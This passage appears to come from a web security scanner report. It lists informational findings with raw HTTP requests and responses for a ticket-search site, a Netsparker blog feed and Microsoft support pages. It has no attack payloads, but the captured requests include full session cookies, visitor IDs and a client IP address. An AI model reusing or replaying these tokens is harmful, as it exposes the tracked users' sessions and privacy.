pageNotLoadingDom.innerHTML = '<div id="page-not-loading-cont">Page not loading?' + ' <a href="' + fsurl + '" rel="nofollow">Click here</a></div>';
}
},"15000");
//]]>
</script>

<div id='sl-pi'></div>

<div id='map-wrapper'>

<div id='mapLoaderMod' style='display:none;'>
<div class='mapLoaderModCont'>
Loading your tickets...
<br />
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
</div>
<div id='fansnap-map-logo'></div>

<div class='zoom-hldr'>
<div id='zoom-ctrl'>
<div class='ui-slider-zoom' id='zoom-level-slider'></div>
<div id='pan-tool'>
<a href="javascript:void(0)" id="pan-top">pan top</a>
<a href="javascript:void(0)" id="pan-right">pan right</a>
<a href="javascript:void(0)" id="pan-btm">pan bottom</a>
<a href="javascript:void(0)" id="pan-left">pan left</a>
<a href="javascript:void(0)" id="pan-reset">pan reset</a>
</div>
<div id='zoom-tool'>
<a href="javascript:void(0)" id="zoom-in">zoom in</a>
<div class='zoom-level row' id='zoom-level-1'>ROW</div>
<div class='zoom-level' id='zoom-level-2'></div>
<div class='zoom-level' id='zoom-level-3'></div>
<div class='zoom-level venue' id='zoom-level-4'>VENUE</div>
<a href="javascript:void(0)" id="zoom-out">zoom out</a>
</div>
</div>

</div>
<div class='dynamic-filter-bar' id='filters'>
<form action='' id='formFilter'>
<div class='filters-seats'>
<label class='inlinelabel'>
# of Tickets
</label>
<select id="seat_count" name="seat_count"><option value="Any" selected="selected">Any</o
...[SNIP]...

Request 2

GET /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:34:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 411
ETag: "b4954110e95cf96da99f9274cf255f3f"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311104091; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:51 GMT
Set-Cookie: _fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleUkiAAY7B0Y6CmJnX2xwSSIBmWh0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL3UyLXRpY2tldHMvdTItd2l0aC1pbnRlcnBvbC1yZXNjaGVkdWxlZC1mcm9tLTcxOS9qdWx5LTIwLTIwMTEtMzg5NjY5P3V0bV9zb3VyY2U9MTk4NyZhY2s9aHR0cCUzYSUyZiUyZnd3dy5iaW5nLmNvbSUyZnMlMmZhY2suaHRtbAY7B0Y6D2JnX3JlZmVyZXIiAZZodHRwOi8vd3d3LmJpbmcuY29tL2V2ZW50cy9zZWFyY2g%2FcT1VMit3aXRoK0ludGVycG9sKyhyZXNjaGVkdWxlZCtmcm9tKzclMmYxOSkmcDE9W0V2ZW50cyUyMHNvdXJjZT0lMjJ2ZXJ0aWNhbCUyMitxemV2ZW50aWQ9JTIyZjM4OTY2OSUyMl0mRk9STT1EVFBFVkU6EGJnX2tleXdvcmRzIi9VMit3aXRoK0ludGVycG9sKyhyZXNjaGVkdWxlZCtmcm9tKzclMmYxOSk6EGJnX3Zpc2l0X2lkaQS%2Bq5gxOhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2ODMwMjc1NTg1OhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXPaG4BpmD6LBjoLb2Zmc2V0af6QnToRc3B2X3NyY18xOTg3VA%3D%3D--db8832195ff0cfef7c8624e2d3a18375249bc2c7; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 23330
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
var fsurl = document.URL;
if (fsurl.indexOf('?') == -1) {
fsurl += "?mt=sta&sl=true";
} else {
fsurl += "&mt=sta&sl=true";
}

var uetParams = escape("_uid=832089022:1482:pgstickets&_ctx=mt:int;sz:1732;id:389669&_cnt=6&_st=&_tag=mt:int;sz:1732;id:389669&ts=" + new Date().getTime() + "&slLink=true");
var imgTag = '<img src="/la/seats-uet?m='+uetParams+'" height="1px" width="1px" style="position:absolute;"/>';

document.getElementById("sl-pi").innerHTML = imgTag;
var pageNotLoadingDom = document.getElementById("page-not-loading");
if(pageNotLoadingDom){
pageNotLoadingDom.innerHTML = '<div id="page-not-loading-cont">Page not loading?' + ' <a href="' + fsurl + '" rel="nofollow">Click here</a></div>';
}
},"15000");
//]]>
</script>

<div id='sl-pi'></div>

<div id='map-wrapper'>

<div id='mapLoaderMod' style='display:none;'>
<div class='mapLoaderModCont'>
Loading your tickets...
<br />
<img alt="Loading-32-onwhite" src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
</div>
<div id='fansnap-map-logo'></div>

<div class='zoom-hldr'>
<div id='zoom-ctrl'>
<div class='ui-slider-zoom' id='zoom-level-slider'></div>
<div id='pan-tool'>
<a href="javascript:void(0)" id="pan-top">pan top</a>
<a href="javascript:void(0)" id="pan-right">pan right</a>
<a href="javascript:void(0)" id="pan-btm">pan bottom</a>
<a href="javascript:void(0)" id="pan-left">pan left</a>
<a href="javascript:void(0)" id="pan-reset">pan reset</a>
</div>
<div id='zoom-tool'>
<a href="javascript:void(0)" id="zoom-in">zoom in</a>
<div class='zoom-level row' id='zoom-level-1'>ROW</div>
<div class='zoom-level' id='zoom-level-2'></div>
<div class='zoom-level' id='zoom-level-3'></div>
<div class='zoom-level venue' id='zoom-level-4'>VENUE</div>
<a href="javascript:void(0)" id="zoom-out">zoom out</a>
</div>
</div>

</div>
<div class='dynamic-filter-bar' id='filters'>
<form action='' id='formFilter'>
<div class='filters-seats'>
<label class='inlinelabel'>
# of Tickets
</label>
<select id="seat_count" name="seat_count"><option value="Any" selected="selected">Any</o
...[SNIP]...

18.4. http://feeds.feedburner.com/netsparker previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://feeds.feedburner.com
Path:	/netsparker

Request 1

GET /netsparker HTTP/1.1
Host: feeds.feedburner.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mavitunasecurity.com/blog/

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
ETag: kkpPsFNF0Wuuzu/QLigKEGMUAaI
Last-Modified: Tue, 19 Jul 2011 15:41:14 GMT
Date: Tue, 19 Jul 2011 15:41:14 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 146403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Netsparker, Web Application Security Scanner - powered by FeedBurner</title>
<link href="http://feedburner.google.com/fb/lib/stylesheets/undohtml.css" rel="stylesheet" type="text/css" media="all">
<link href="http://feedburner.google.com/fb/feed-styles/bf30.css" rel="stylesheet" type="text/css" media="all">
<link rel="alternate" type="application/rss+xml" title="Netsparker, Web Application Security Scanner" href="http://feeds.feedburner.com/netsparker">
<script type="text/javascript" src="http://feedburner.google.com/fb/feed-styles/bf30.js"></script>
</head>
<body id="browserfriendly" onload="jsFeedUrl='http://feeds.feedburner.com/netsparker';loadSubscribeAreaUltra('standard');go_decoding()">
<div id="cometestme" style="display:none;">&</div>
<div id="bodycontainer">
<div id="bannerblock">
<a href="http://www.mavitunasecurity.com/blog/" title="Link to original website"><img src="http://www.mavitunasecurity.com/s/d/i/feed-logo.png" id="feedimage" alt="Netsparker, Web Application Security Scanner"></a>
<h1>
<a href="http://www.mavitunasecurity.com/blog/" title="Link to original website">Netsparker, Web Application Security Scanner</a>
</h1>
<h2>syndicated content powered by FeedBurner</h2>
<p style="clear:both"></p>
</div>
<div id="bodyblock">
<div id="subscribenow" class="subscribeblock action">
<div id="subscribe-userchoice" style="display:none">
<p id="subscribeLink">
<a href="#">...</a>
</p>
<p id="resetLink">Reset this favorite; <a href="#" onclick="return clearUserchoice('standard')">show all Subscribe options</a>
</p>
</div>
<div id="subscribe-options">
<h3>Subscribe Now!</h3>
<h4>...with web-based news readers. Click your choice below:</h4>
<div id="webbased">
<a href="http://add.my.yahoo.com/rss?url=http://feeds.feedburner.com/netsparker" onclick="t
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Content-Type: text/xml; charset=UTF-8
ETag: y/yCDMzrU40KlsYnFkoxa4v+PFs
Last-Modified: Tue, 19 Jul 2011 15:26:55 GMT
Date: Tue, 19 Jul 2011 15:41:15 GMT
Expires: Tue, 19 Jul 2011 15:41:15 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 172951

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">
<channel>
<title>Netsparker, Web Application Security Scanner</title>
<link>http://www.mavitunasecurity.com/blog/</link>
<description>Netsparker, Web application security scanner's blog from Mavituna Security. </description>
<lastBuildDate>Tue, 24 May 2011 09:34:35 GMT</lastBuildDate>
<ttl>480</ttl>
<image>
<title>Netsparker, Web Application Security Scanner</title>
<link>http://www.mavitunasecurity.com/blog/</link>
<url>http://www.mavitunasecurity.com/s/d/i/feed-logo.png</url>
</image>
<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/netsparker" /><feedburner:info uri="netsparker" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
<title>False Positives - The Dirty Secret of the Web Security Scanning Industry</title>
<link>http://feedproxy.google.com/~r/netsparker/~3/psuqtJckSAQ/</link>
<guid isPermaLink="false">http://www.mavitunasecurity.com/blog/false-positives-the-dirty-secret-of-the-web-security-scanning-industry/</guid>
<author>Ferruh Mavituna</author>
<pubDate>Tue, 24 May 2011 09:34:35 GMT</pubDate>
<category>false-positive</category>
<category>web-app-scanners</category>
<category>industry</category>
<description><p><img style="margin: 0px 10px 10px 0px; display: inline; float: left" align="left" src="http://www.mavitunasecurity.com/s/r/b_trust.jpg" width="335" height="252" />
...[SNIP]...

18.5. http://support.microsoft.com/contactus/cu_sc_prodact_master previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://support.microsoft.com
Path:	/contactus/cu_sc_prodact_master

Request 1

GET /contactus/cu_sc_prodact_master HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/cu_sc_prodact_master
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; wedcsinc=1; ST_GN_EN-US=5_0_0; fmsmemo=st=|13083|13701; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078475316:ss=1311077969178; sdninc=3; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:27:48&Microsoft.NumberOfVisits=1&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:27:48&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=68&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=h7GYQbp8zAEkAAAAYjRhYTU1M2MtNWZhZC00MTkxLWIwMjYtZjAzYjBjNjFkNWM4kVMZvo9G5bHj7F5QoTXJNIqBvRs1; fmshb=0,1311089278064

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:27:54 GMT
Content-Length: 40953

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="cu_sc_prodact_master" /><meta name="DCSext.sup_cln" content="en-us" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCSext.sup_ln"
...[SNIP]...
<script type="text/javascript" src="/contactus/common/script/contactus.js?43"></script><script type="text/javascript" src="/contactus/common/script/alerts.js?43"></script><meta name="robots" content="" /><meta name="MS.LOCALE" content="en" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="content-language" content="en-US"><script type="text/javascript" src="/library/JavaScript/support/CN/ad.js"></script><script type="text/javascript" src="/common/script/gsfx/search.js?43"></script><script type="text/javascript" src="http://autocomplete.support.microsoft.com/script/ac.js?43"></script><script type="text/javascript">var gCookieDomain='';var url_exactMatch='/select/Default.aspx?target=assistance';</script><title>Help and Support</title><XMLREADER><link rel="stylesheet" type="text/css" href="/common/css/default/default.css?43" /><link rel="stylesheet" type="text/css" href="/contactus/common/css/contactus.css?43" /><link rel="stylesheet" type="text/css" href="/common/css/default/branding.css?43" /></XMLREADER>


<script type="text/javascript" src="/common/script/fx/surveycookieutil.js?43"></script></head><body onload="thisLoad();" onunload="thisUnload();">
<style type="text/css">
body
{

background:url('/library/images/support/cn/parent_bkgnd.png') repeat-x #FFFFFF;

}

#gsfx_brnd_PageHeaderImage
{
background:url('/library/images/support/cn/mso_energy.jpg') no-repeat top center;
}

#gsfx_brnd_SiteHeaderImage
{
height:0px;
}

.gsfx_brnd_NetworkLink, .gsfx_brnd_NetworkLink:visited, .gsfx_brnd_NetworkLink a, .gsfx_brnd_NetworkLink a:visited
{
color: #FFFFFF;
}

.gsfx_brnd_NetworkLink:hover, .gsfx_brnd_NetworkLink:active, .gsfx_brnd_NetworkLink:focus,
.gsfx_brnd_N
...[SNIP]...

Request 2

GET /contactus/cu_sc_prodact_master HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; wedcsinc=1; ST_GN_EN-US=5_0_0; fmsmemo=st=|13083|13701; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078475316:ss=1311077969178; sdninc=3; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:27:48&Microsoft.NumberOfVisits=1&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:27:48&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=68&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=h7GYQbp8zAEkAAAAYjRhYTU1M2MtNWZhZC00MTkxLWIwMjYtZjAzYjBjNjFkNWM4kVMZvo9G5bHj7F5QoTXJNIqBvRs1; fmshb=0,1311089278064

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:30:06 GMT
Content-Length: 41188

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="cu_sc_prodact_master" /><meta name="DCSext.sup_cln" content="en-us" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCSext.sup_ln"
...[SNIP]...
<script type="text/javascript">setcookieval("gssSITE","gn",'',true);</script><script type="text/javascript">setcookieval("gssTHEME","gn",'',true);</script><script type="text/javascript">setcookieval("gssTOOLBAR","gn",'',true);</script><script type="text/javascript" src="/contactus/common/script/contactus.js?43"></script><script type="text/javascript" src="/contactus/common/script/alerts.js?43"></script><meta name="robots" content="" /><meta name="MS.LOCALE" content="en" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="content-language" content="en-US"><script type="text/javascript" src="/library/JavaScript/support/CN/ad.js"></script><script type="text/javascript" src="/common/script/gsfx/search.js?43"></script><script type="text/javascript" src="http://autocomplete.support.microsoft.com/script/ac.js?43"></script><script type="text/javascript">var gCookieDomain='';var url_exactMatch='/select/Default.aspx?target=assistance';</script><title>Help and Support</title><XMLREADER><link rel="stylesheet" type="text/css" href="/common/css/default/default.css?43" /><link rel="stylesheet" type="text/css" href="/contactus/common/css/contactus.css?43" /><link rel="stylesheet" type="text/css" href="/common/css/default/branding.css?43" /></XMLREADER>


<script type="text/javascript" src="/common/script/fx/surveycookieutil.js?43"></script></head><body onload="thisLoad();" onunload="thisUnload();">
<style type="text/css">
body
{

background:url('/library/images/support/cn/parent_bkgnd.png') repeat-x #FFFFFF;

}

#gsfx_brnd_PageHeaderImage
{
background:url('/library/images/support/cn/mso_energy.jpg') no-repeat top center;
}

#gsfx_brnd_SiteHeaderImage
{
height:0px;
}

.gsfx_brnd_NetworkLink, .gsfx_brnd_NetworkLink:vi
...[SNIP]...

18.6. http://support.microsoft.com/gp/csa previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://support.microsoft.com
Path:	/gp/csa

Request 1

GET /gp/csa HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; sdninc=6; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; wedcsinc=3; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; .ASPXANONYMOUS=VT3Vw7p8zAEkAAAAMmI2MjhmMGQtZjljMC00ZjVjLWI3NTQtYzI1YjhjYjRkODFmgfpg6oo1Tx6e5ghYq_tHKKDqu1A1; fmshb=0,1311089497349

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=ja--rLt8zAEkAAAAZTAyNTA0MjEtMjQwNi00OTI1LTlhMWEtMzgzZDFkY2JjYmZheOdMAmdUxFJD1z3fbqoo-WMAQwU1; expires=Tue, 27-Sep-2011 02:17:58 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:37:58 GMT
Content-Length: 45396

<html lang="en-US"><head><link title="Microsoft Support Search" type="application/opensearchdescription+xml" rel="search" href="/common/opensearchdescriptor.aspx?ln=en-us" /><meta name="ms.gsfxversion
...[SNIP]...
